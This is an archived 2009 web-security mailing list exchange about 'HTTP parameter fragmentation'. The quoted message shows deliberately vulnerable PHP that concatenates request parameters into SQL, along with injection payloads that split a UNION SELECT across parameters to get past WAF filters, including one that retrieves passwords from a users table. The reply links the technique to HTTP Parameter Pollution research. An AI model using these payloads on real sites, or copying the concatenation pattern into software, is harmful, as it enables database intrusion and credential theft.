[WEB SECURITY] HTTP parameters fragmentation

Steve Pinkham steve.pinkham at gmail.com
Wed Aug 19 12:10:12 EDT 2009


See http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
for the first formal writeup of these issues I'm aware of.  He used the 
HTTP Parameter Pollution name, which covers both your specific 
fragmentation attack and a few other similar problems. (I.E. sometimes 
only the second occurrence is looked at by one part of the system, but 
filters only touch the first part, etc)  The chart on page 9 shows his 
findings in brief, and I've found it helpful.

Steve
Dmitriy Evteev wrote:
> While preparing an article about WAF bypassing methods, I found an 
> interesting way to bypass filters via HTTP parameters fragmentation.
> 
>  
> 
> Vulnerable code example
> 
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
> 
>  
> 
> The following request doesn’t allow to conduct an attack
> 
> index.php?a=1+union+select+1,2/*
> 
>  
> 
> The following request’s succeeded using HPF
> 
> index.php?a=1+union/*&b=*/select+1,2
> 
>  
> 
> In the case, SQL request looks like
> 
> select * from table where a=1 union/* and b=*/select 1,2
> 
>  
> 
> Another example:
> 
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." 
> limit ".$_GET['c']);
> 
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." 
> order by ".$_GET['c']." limit 1");
> 
>  
> 
> Using HPF (HTTP Parameter Fragmentation), the request’s succeeded:
> 
> index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
> 
>  
> 
> The question is: is there any name for the technique? Please, advise me 
> if you know articles or experts in  the field (for example, I found a 
> reference in 
> http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf, 
> page 79).
> 
> Thank you for help and cooperation in advance!
>  
> 
> - - - - - - - - - - - - - - -
> Best Regards, Dmitry Evteev
> Positive Technologies Co.
> Tel.: (495) 744-0144
> Web: http://www.ptsecurity.ru
> 
>  
> 


-- 
  | Steven E. Pinkham                      |
  | GPG public key ID CD31CAFB             |

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list